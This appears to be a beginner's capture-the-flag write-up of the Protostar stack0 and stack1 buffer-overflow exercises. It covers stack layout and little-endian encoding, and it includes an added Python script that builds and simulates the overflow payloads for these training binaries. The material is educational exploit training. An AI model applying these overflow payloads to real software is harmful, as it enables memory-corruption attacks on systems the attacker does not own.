
Protostar walkthrough: stack0 and stack1

I started doing the binary exploitation challenges from the exploit.education website. To be honest, I was surprised by the way they approach every question. With these challenges you will get good at solving basic stack buffer overflow problems. The challenge set we will be doing is called Protostar. It covers several exploit classes (stack, heap, etc.), but let us concentrate on the stack ones for now. Before starting, it is only fair to tell you that I am a newbie too; I approached this by referring to a book called Nightmare. I will now take you through how I solved the challenges. Let's go!

STACK ZERO

This is the first challenge. The source code is shown on the challenge page. Let us analyze it. The function declares two local variables: an integer named "modified" and "buffer", an array of 64 characters. "modified" is set to 0, and the program then reads a line into "buffer" with gets(). Things get interesting from here. The hint for the question, given in the challenge section of the website, tells us that gets() performs no bounds checking: there is no memory protection, so we can overwrite the other values on the stack too. Further down the code we see the check if (modified != 0); if we can make that condition true, we complete the challenge.

For this you need to know how the stack works. When a function declares local variables, a portion of stack memory is reserved for them. The stack grows from higher addresses towards lower addresses, so the first value pushed sits at the highest address and each later one sits below it. In this frame "modified" ends up at a higher address than "buffer", and an array is written from its lowest address upward, so anything written past the end of the 64-byte buffer runs straight into "modified": the 65th character changes its value. (The exact layout is the compiler's decision rather than a law, so on another build you would confirm it in gdb or a disassembler; on the Protostar binary it is as described.)

Now let us look at the exploit. We use Python to build the input, because typing 65 characters by hand is boring. The script prints 64 A's to fill up the buffer, followed by a few extra characters that land in "modified", and we feed that output to the program on standard input (that is where gets() reads from). The program prints "you have changed the modified variable". So we successfully finished our first challenge!

STACK ONE

The explanation of the stack above will come in handy when we solve the next challenges. This challenge is to
learn about the little-endian format and how to get a desired value into memory. The source code is given to us on the challenge page. The initial setup is the same, but this time "modified" has to equal 0x61626364. Let us look at the hints given on the website. Two hints are given. First, we need to know about hexadecimal: every character you can type has a numeric code (its ASCII value), which the machine processes easily and which is conveniently written as two hexadecimal digits; for example "a" is 0x61. The second hint is the little-endian format, which is fairly easy once you get the concept. On a little-endian machine a multi-byte integer is stored with its least-significant byte at the lowest address, so the bytes of 0x61626364 appear in memory in reverse order: 64 63 62 61. In terms of the hex string, that means reversing two hex digits (one byte) at a time, not one digit at a time. So to place 0x61626364 in "modified" we send the bytes \x64\x63\x62\x61, which are simply the ASCII characters "dcba".

When we analyze the code, we see that this time the input is taken from a command-line argument rather than from gets(), so we cannot proceed exactly as in the previous challenge. Let us try a different approach. With the shell's $(...) command substitution, the output of the Python one-liner becomes the program's argument. One caveat that comes with passing a payload through the command line: argv strings are NUL-terminated, so the payload cannot contain a 0x00 byte (none is needed here). And voila! We finished our second challenge too! The next challenge will be posted soon. Until then, goodbye!
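The following script is an added example written for this write-up; it is not the one-liner from the original post and not part of Protostar. It builds the stack0 and stack1 payloads described above and shows the little-endian point concretely: 0x61626364 becomes the bytes \x64\x63\x62\x61 ("dcba"), and the correct reversal is per byte (two hex digits), not per hex digit. It assumes the layout the post describes (a 64-byte buffer directly below a 4-byte "modified" integer) and a 32-bit little-endian x86 target, which is what the Protostar VM is. The simulate_check() helper models that frame in a bytearray so the payloads can be checked offline before running them on the VM.

```python
"""Payload builders for Protostar stack0 / stack1.

Added example, not the walkthrough's own script. Assumes the frame layout
described in the post: char buffer[64] immediately below int modified,
on a 32-bit little-endian x86 target.
"""
import struct

BUFFER_LEN = 64            # size of buffer[] in the stack0/stack1 source
TARGET_VALUE = 0x61626364  # value stack1 compares 'modified' against


def little_endian(value):
    """Lay out a 32-bit value the way memory holds it on a little-endian
    machine: least-significant byte first. struct's '<I' is the usual
    exploit-dev idiom; value.to_bytes(4, 'little') is equivalent."""
    return struct.pack("<I", value)


def reverse_hex_bytewise(hexdigits):
    """The 'reverse two characters at a time' rule from the post, made
    explicit: split the hex string into byte-sized pairs and reverse
    the pairs, keeping each pair's own digit order intact."""
    pairs = [hexdigits[i:i + 2] for i in range(0, len(hexdigits), 2)]
    return "".join(reversed(pairs))


def read_back(raw):
    """Interpret raw stack bytes the way the CPU does when it loads the
    int 'modified' for the comparison."""
    return int.from_bytes(raw, "little")


def stack0_payload():
    """stack0: any non-zero byte past the 64th lands in 'modified'."""
    return b"A" * BUFFER_LEN + b"B"  # the 65th byte overwrites modified's low byte


def stack1_payload():
    """stack1: the 4 bytes after the buffer must read back as 0x61626364,
    so they are sent least-significant byte first."""
    return b"A" * BUFFER_LEN + little_endian(TARGET_VALUE)


def simulate_check(payload):
    """Model the frame as buffer[64] followed by int modified (initially 0),
    copy the payload in with no bounds check (as gets()/strcpy would), and
    return the value 'modified' holds afterwards."""
    frame = bytearray(BUFFER_LEN + 4)        # buffer + modified, all zero
    frame[:len(payload)] = payload           # unchecked copy overruns the buffer
    return read_back(frame[BUFFER_LEN:BUFFER_LEN + 4])


if __name__ == "__main__":
    # The little-endian encoding of the target happens to be printable ASCII.
    print(little_endian(TARGET_VALUE))                     # b'dcba'
    print(reverse_hex_bytewise("61626364"))                # 64636261
    print(hex(simulate_check(stack0_payload())))           # non-zero
    print(hex(simulate_check(stack1_payload())))           # 0x61626364
```

On the VM, stack0 takes the payload on standard input (gets()), so the script's output is piped into the binary; stack1 takes it as a command-line argument, which is where the post's $(...) command substitution comes in. Both payloads here consist only of printable ASCII, so they survive the shell and argv unchanged; a payload containing a 0x00 byte could not be passed through argv at all.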